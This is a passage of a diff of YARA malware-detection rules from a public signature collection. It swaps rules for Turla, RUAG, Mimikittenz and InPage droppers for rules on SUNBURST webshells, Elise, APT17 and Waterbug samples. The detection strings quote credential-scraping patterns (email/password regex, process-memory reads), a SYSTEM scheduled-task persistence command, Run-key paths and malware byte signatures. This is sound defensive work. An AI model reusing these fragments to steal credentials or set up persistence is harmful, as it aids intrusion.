-		$flowerOverlap3 = { 55 8B EC 53 56 8B 75 20 85 F6 74 03 83 26 00 8D 45 20 50 68 19 00 02 00 6A 00 FF 75 0C FF 75 08 }
-		$flowerOverlap4 = { 55 8B EC 51 8D 4D FC 33 C0 51 50 6A 26 50 89 45 FC FF 15 }
-		$flowerOverlap5 = { 85 DB 74 04 8B C3 EB 1A 8B 45 08 3B 45 14 74 07 B8 5D 06 00 00 EB 0B 85 F6 74 05 8B 45 0C 89 06 }
-		$flowerOverlap6 = { 85 FF 74 12 83 7D F8 01 75 0C FF 75 0C FF 75 08 FF 15 }
+		$ps = "function" nocase ascii wide
+		$s1 = "/Create /RU system /SC ONLOGON" ascii wide
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide
 
 	condition:
-		all of ( $flowerOverlap* ) or 2 of ( $cnc* ) or all of ( $regkey* )
+		all of them
 }
-rule SIGNATURE_BASE_STUXSHOP_Oscheck
+rule SIGNATURE_BASE_LOG_APT_WEBSHELL_Solarwinds_SUNBURST_Report_Webshell_Dec20_2
 {
 	meta:
-		description = "Identifies the OS Check function in STUXSHOP and CheshireCat"
-		author = "Silas Cutler (havex@Chronicle.Security)"
-		id = "24fb5c6f-d5ab-5f17-942c-b712e2c017d4"
-		date = "2023-12-05"
+		description = "Detects webshell access mentioned in FireEye's SUNBURST report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fb86164d-13de-5357-8f52-c597b51127ff"
+		date = "2020-12-21"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxshop.yar#L32-L47"
+		reference = "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_susp_sunburst.yar#L21-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
-		logic_hash = "3dca26e622289c2d244e3af035e892455a47daa67dbe0c6fad29d9f7403cbc6b"
+		logic_hash = "ec52e244a483ace0f6932b553b159b23b767c00d1f64a4711e5f359832e846f5"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
 
 	strings:
-		$ = {10 F7 D8 1B C0 83 C0 ?? E9 ?? 01 00 00 39 85 7C FF FF FF 0F 85 ?? 01 00
-      00 83 BD 70 FF FF FF 04 8B 8D 74 FF FF FF 75 0B 85 C9 0F 85 ?? 01 00 00 6A 05
-      5E }
-		$ = {01 00 00 3B FA 0F 84 ?? 01 00 00 80 7D 80 00 B1 62 74 1D 6A 0D 8D 45 80
-      68 ?? ?? ?? 10 50 FF 15 ?? ?? ?? 10 83 C4 0C B1 6F 85 C0 75 03 8A 4D 8D 8B C6
-      }
+		$xr1 = /logoimagehandler.ashx[^\n\s]{1,400}clazz=/ ascii wide
 
 	condition:
-		any of them
+		$xr1
 }
-rule SIGNATURE_BASE_Gen_Suspicious_Inpage_Dropper : FILE
+
+rule SIGNATURE_BASE_Elise_Jan18_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Florian Roth"
-		id = "9144711a-e6ee-5c97-a5f4-3f6df1d630dc"
-		date = "2023-12-05"
+		description = "Detects Elise malware samples - fake Norton Security NavShExt.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8e4f4ec8-5d31-5990-8c14-861423571a79"
+		date = "2018-01-24"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/Ahmedfshosha/status/1138138981521154049"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_suspicious_InPage_dropper.yar#L1-L23"
+		reference = "https://twitter.com/blu3_team/status/955971742329135105"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lotusblossom_elise.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8ab5d0bffa72b32f4c388f42a38a799c178fddf9f06b1262842e146c43448bd4"
-		score = 65
+		logic_hash = "d43486db0d4263f91924da89f1922ad965ed91eadd07ae0705eecd371f31fa44"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852"
-		hash2 = "1d1e7a6175e6c514aaeca8a43dabefa017ddc5b166ccb636789b6a767181a022"
-		hash3 = "bd293bdf3be0a44a92bdb21e5fa75c124ad1afed3c869697bf90c9732af0e994"
-		hash4 = "d8edf3e69f006f85b9ee4e23704cd5e95e895eb286f9b749021d090448493b6f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6dc2a49d58dc568944fef8285ad7a03b772b9bdf1fe4bddff3f1ade3862eae79"
 
 	strings:
-		$s1 = "InPage Arabic Document"
-		$c1 = {31 06 83 c6 04 e2 }
-		$c2 = {90 90 90 90 90 90 90 e8 fb }
+		$s1 = "NavShExt.dll" fullword wide
+		$s2 = "Norton Security" fullword wide
+		$a1 = "donotbotherme" fullword ascii
 
 	condition:
-		filesize < 3MB and uint32be( 0 ) == 0xD0CF11E0 and $s1 and 1 of ( $c* )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( pe.imphash ( ) == "e9478ee4ebf085d1f14f64ba96ef082f" or ( 1 of ( $s* ) and $a1 ) )
 }
-rule SIGNATURE_BASE_Invoke_Mimikittenz : FILE
+rule SIGNATURE_BASE_Gen_Excel_Auto_Open_Evasion : FILE
 {
 	meta:
-		description = "Detects Mimikittenz - file Invoke-mimikittenz.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6dcf3d0a-302b-520c-97c6-fd843c8a25b9"
-		date = "2016-07-19"
+		description = "Detects an obfuscated Auto_Open cell names in Excel files"
+		author = "@JohnLaTwC"
+		id = "e33b8d1d-4978-5747-8b5b-730e6c57dbf0"
+		date = "2020-09-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/putterpanda/mimikittenz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mimikittenz.yar#L10-L29"
+		reference = "https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_excel_auto_open_evasion.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f0410a0290d09d3574854b55ffe578f6f799368e14677b581cd65d18700a8656"
-		score = 90
-		quality = 85
+		hash = "e23f9f55e10f3f31a2e76a12b174b6741a2fa1f51cf23dbd69cf169d92c56ed5"
+		logic_hash = "d7d81683b9abd7b89d6d6ee4d14ff37359acd353a6bd1d88bc793525c8f203d9"
+		score = 70
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a"
+		hash1 = "bb3c9739de8ffe2e0f375847d41a010463ec19f1d3f578ac053651a51ed69bbc"
+		hash2 = "56ff65b7f6bf5936883f52b50ca66e768b2088158cc77af681ffab7122be7753"
+		hash3 = "97243214ac3cad74d60b0648e39d6a9600860edba51c670b5226e058ba658957"
+		hash4 = "9ebf085c05ae94c1b6c4e011001a6c11de3ca754a56ed380314ef501b777e593"
+		hash5 = "b5a8bbf3c7d49bd208d8302f6867b5f6d3d7c09830b575967801893498cc92d9"
 
 	strings:
-		$x1 = "[mimikittenz.MemProcInspector]" ascii
-		$s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii
-		$s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii
-		$s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii
-		$s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii
+		$auto_open = { 00 00 00 00 01 [0-2] (61 | 41) [0-5](75 | 55) [0-5](74 | 54) [0-5](6f | 4f) [0-5](5f | 5f) [0-5](6f | 4f) [0-5](70 | 50) [0-5](65 | 45) [0-5](6e | 4e)}
+		$plain_auto_open = "auto_open" nocase wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 60KB and 2 of them ) or $x1
+		filesize < 1MB and uint32be( 0 ) == 0xD0CF11E0 and $auto_open and #plain_auto_open == 0
 }
-rule SIGNATURE_BASE_Turla_APT_Srsvc : TURLA FILE
+rule SIGNATURE_BASE_APT17_Sample_FXSST_DLL : FILE
 {
 	meta:
-		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
+		description = "Detects Samples related to APT17 activity - file FXSST.DLL"
 		author = "Florian Roth (Nextron Systems)"
-		id = "951ee9f8-1ab0-5fd5-be9b-053ec82f6ea2"
-		date = "2016-06-09"
+		id = "e4b9b25e-8895-5ba5-b706-bfb6892c16ae"
+		date = "2015-05-14"
 		modified = "2023-12-05"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L10-L31"
+		reference = "https://goo.gl/ZiJyQv"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_malware.yar#L10-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "76bd2aacde66114090d1c1767da64728219230964a0bc78a5d830819c46bac3a"
+		hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
+		logic_hash = "51d6da6c3ec46dc9e991a6a36de6d79626f1859296cda65e9027951c13aa4cd5"
 		score = 75
 		quality = 85
-		tags = "TURLA, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		family = "Turla"
-		hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
-		hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"
 
 	strings:
-		$x1 = "SVCHostServiceDll.dll" fullword ascii
-		$s2 = "msimghlp.dll" fullword wide
-		$s3 = "srservice" fullword wide
-		$s4 = "ModStart" fullword ascii
-		$s5 = "ModStop" fullword ascii
+		$x1 = "Microsoft? Windows? Operating System" fullword wide
+		$x2 = "fxsst.dll" fullword ascii
+		$y1 = "DllRegisterServer" fullword ascii
+		$y2 = ".cSV" fullword ascii
+		$s1 = "GetLastActivePopup"
+		$s2 = "Sleep"
+		$s3 = "GetModuleFileName"
+		$s4 = "VirtualProtect"
+		$s5 = "HeapAlloc"
+		$s6 = "GetProcessHeap"
+		$s7 = "GetCommandLine"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or all of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( all of ( $x* ) or all of ( $y* ) ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_Turla_APT_Malware_Gen1 : TURLA FILE
+rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core_PDF : FILE
 {
 	meta:
-		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ead2da1-3544-5a26-8767-6d3f29de8b96"
-		date = "2016-06-09"
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
+		author = "Symantec Security Response"
+		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
+		date = "2015-01-22"
 		modified = "2023-12-05"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L33-L71"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3676d01d5e4044fd49292eb7b4376ff90f0a41141f89a19b13c5518b01257be3"
+		logic_hash = "a854926a4a98eb1d13a582b4ff4504b9740b8bbe7aa6b5192aeb4d2438a58926"
 		score = 75
-		quality = 85
-		tags = "TURLA, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		family = "Turla"
-		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
-		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
-		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
-		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
-		hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
-		hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
-		hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
-		hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
-		hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
-		hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
+		quality = 60
+		tags = "FILE"
 
 	strings:
-		$x1 = "too long data for this type of transport" fullword ascii
-		$x2 = "not enough server resources to complete operation" fullword ascii
-		$x3 = "Task not execute. Arg file failed." fullword ascii
-		$x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii
-		$s1 = "peer has closed the connection" fullword ascii
-		$s2 = "tcpdump.exe" fullword ascii
-		$s3 = "windump.exe" fullword ascii
-		$s4 = "dsniff.exe" fullword ascii
-		$s5 = "wireshark.exe" fullword ascii
-		$s6 = "ethereal.exe" fullword ascii
-		$s7 = "snoop.exe" fullword ascii
-		$s8 = "ettercap.exe" fullword ascii
-		$s9 = "miniport.dat" fullword ascii
-		$s10 = "net_password=%s" fullword ascii
+		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/
+		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 2 of ( $x* ) or 8 of ( $s* ) ) ) or ( 12 of them )
+		uint32( 0 ) == 0x46445025 and #a > 150 and #b > 200
 }
-rule SIGNATURE_BASE_RUAG_APT_Malware_Gen2 : FILE
+rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Dll
 {
 	meta:
-		description = "Detects malware used in the RUAG APT case"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8a50e5d5-f16d-53c7-825c-a8e51c207eac"
-		date = "2016-06-09"
-		modified = "2023-01-06"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L73-L108"
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
+		author = "Symantec Security Response"
+		id = "2aae09a3-6e59-5951-941e-c1f82aada979"
+		date = "2015-01-22"
+		modified = "2023-12-05"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L17-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "62c65a5c85930dd2a928508401113ffba28bc6a07188d9bf5c68234bea10e1aa"
-		score = 90
+		logic_hash = "f29ff81d62bd6bea776aeddc0725b034624f836c234441f63a8b697e959d3f8d"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
-		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
-		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
-		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		tags = ""
 
 	strings:
-		$x1 = "Internal command not support =((" ascii
-		$x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii
-		$x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii
-		$x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii
-		$x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii
-		$x6 = "L|-1|try to run dll %s with user priv|" fullword ascii
-		$x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii
-		$x8 = "\\\\%s\\pipe\\comnode" fullword ascii
-		$x9 = "Plugin dll stop failed." fullword ascii
-		$x10 = "AS_USER:LogonUser():%d" fullword ascii
-		$s1 = "MSIMGHLP.DLL" fullword wide
-		$s2 = "msimghlp.dll" fullword ascii
-		$s3 = "ximarsh.dll" fullword ascii
-		$s4 = "msximl.dll" fullword ascii
-		$s5 = "INTERNAL.dll" fullword ascii
-		$s6 = "\\\\.\\Global\\PIPE\\" ascii
-		$s7 = "ieuser.exe" fullword ascii
+		$string1 = "/%s?rank=%s"
+		$string2 = "ModuleStart\x00ModuleStop\x00start"
+		$string3 = "1156fd22-3443-4344-c4ffff"
+		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 10 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Turla_APT_Malware_Gen3 : TURLA FILE
+rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core : FILE
 {
 	meta:
-		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8cb7d873-e4f9-553e-84e8-dbc0d31f65ab"
-		date = "2016-06-09"
-		modified = "2023-12-05"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L110-L150"
+		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
+		author = "Symantec Security Response"
+		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
+		date = "2015-01-22"
+		modified = "2023-01-27"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L34-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8c24cf71841efc974c8a4d8eb5662137592c1d454821c9beadc50d83cb19333c"
+		logic_hash = "59e1363225b1f7765e953e3d6803270b82f4268431d92ef00ed1010df0793e5f"
 		score = 75
 		quality = 85
-		tags = "TURLA, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		family = "Turla"
-		hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
-		hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
-		hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
-		hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
-		hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
-		hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
-		hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
-		hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
-		hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+		tags = "FILE"
 
 	strings:
-		$x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii
-		$x2 = "WaitMutex Abandoned %p" fullword ascii
-		$x3 = "OPER|Wrong config: no port|" fullword ascii
-		$x4 = "OPER|Wrong config: no lastconnect|" fullword ascii
-		$x5 = "OPER|Wrong config: empty address|" fullword ascii
-		$x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii
-		$x7 = "OPER|Wrong config: no auth|" fullword ascii
-		$x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii
-		$s3 = "www.yahoo.com" fullword ascii
-		$s4 = "MSXIML.DLL" fullword wide
-		$s5 = "www.bing.com" fullword ascii
-		$s6 = "%s: http://%s%s" fullword ascii
-		$s7 = "/javascript/view.php" fullword ascii
-		$s8 = "Task %d failed %s,%d" fullword ascii
-		$s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii
+		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
+		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
+		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04}
+		$code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 6 of ( $s* ) ) ) or ( 10 of them )
+		uint16( 0 ) == 0x5A4D and ( ( $code1 or $code2 ) or ( $code3 and $code4 ) )
 }
-rule SIGNATURE_BASE_Turla_Mal_Script_Jan18_1 : FILE
+rule SIGNATURE_BASE_Waterbug_Turla_Dropper
 {
 	meta:
-		description = "Detects Turla malicious script"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4b550b3c-182c-5dc0-b2d2-13925c22be81"
-		date = "2018-01-19"
+		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
+		author = "Symantec Security Response"
+		id = "f9683ac7-36f3-5a2a-8b76-e8e2527f4e0d"
+		date = "2015-01-22"
 		modified = "2023-12-05"
-		reference = "https://ghostbin.com/paste/jsph7"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L152-L169"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L50-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2386abf8afdf8ed9cfd55cb3dcbb998eb732744c601fd9af701cf64c366a0e62"
+		logic_hash = "6836b8d28fb41d9459f24d22e3c428b022b26885b7dce1caa5b0d5a7a1b7f82b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "180b920e9cea712d124ff41cd1060683a14a79285d960e17f0f49b969f15bfcc"
+		tags = ""
 
 	strings:
-		$s1 = ".charCodeAt(i % " ascii
-		$s2 = "{WScript.Quit();}" fullword ascii
-		$s3 = ".charAt(i)) << 10) |" ascii
-		$s4 = " = WScript.Arguments;var " ascii
-		$s5 = "= \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var i;" ascii
+		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
+		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
 
 	condition:
-		filesize < 200KB and 2 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Turla_Kazuarrat : FILE
+rule SIGNATURE_BASE_Waterbug_Fa_Malware : FILE
 {
 	meta:
-		description = "Detects Turla Kazuar RAT described by DrunkBinary"
-		author = "Markus Neis / Florian Roth"
-		id = "147cc7b7-6dbd-51a2-9501-bcbaec32e20e"
-		date = "2018-04-08"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/982969891975319553"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L173-L192"
+		description = "Symantec Waterbug Attack - FA malware variant"
+		author = "Symantec Security Response"
+		id = "b09f798a-2875-59ca-b880-971d8f973c76"
+		date = "2015-01-22"
+		modified = "2023-01-27"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L64-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d7f15fe8e33a9e3516eab5c3c5664aeee25d1d153f01b888a50dd2accba432ca"
+		logic_hash = "b3ac0d69551f27c7f81e24eb00e110639d4b31c8581dfee82715d65528b09632"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "6b5d9fca6f49a044fd94c816e258bf50b1e90305d7dab2e0480349e80ed2a0fa"
-		hash2 = "7594fab1aadc4fb08fb9dbb27c418e8bc7f08dadb2acf5533dc8560241ecfc1d"
-		hash3 = "4e5a86e33e53931afe25a8cb108f53f9c7e6c6a731b0ef4f72ce638d0ea5c198"
 
 	strings:
-		$x1 = "~1.EXE" wide
-		$s2 = "dl32.dll" fullword ascii
-		$s3 = "HookProc@" ascii
-		$s4 = "0`.wtf" fullword ascii
+		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
+		$string2 = "d:\\proj\\cn\\fa64\\"
+		$string3 = "sengoku_Win32.sys\x00"
+		$string4 = "rk_ntsystem.c"
+		$string5 = "\\uroboros\\"
+		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.imphash ( ) == "682156c4380c216ff8cb766a2f2e8817" or 2 of them )
+		uint16( 0 ) == 0x5A4D and ( any of ( $string* ) )
 }
-rule SIGNATURE_BASE_MAL_Turla_Agent_BTZ : FILE
+rule SIGNATURE_BASE_Waterbug_Sav : FILE
 {
 	meta:
-		description = "Detects Turla Agent.BTZ"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bd642f11-19f6-5178-b978-1215215fea86"
-		date = "2018-04-12"
-		modified = "2023-01-06"
-		reference = "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla.yar#L195-L226"
+		description = "Symantec Waterbug Attack - SAV Malware"
+		author = "Symantec Security Response"
+		id = "685849de-9892-56bf-8215-21b08d8b2d7c"
+		date = "2015-01-22"
+		modified = "2023-01-27"
+		reference = "http://t.co/rF35OaAXrl"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L114-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3a091d29ef5981b9ab9c0e4114fef9de70acbcbc8ea8518183a567459e1086fa"
-		score = 90
+		logic_hash = "c8622ac6cb1f0b9965fe6ee1a4860f19d8b0dc1c586e2a3771420b8d78648066"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8"
 
 	strings:
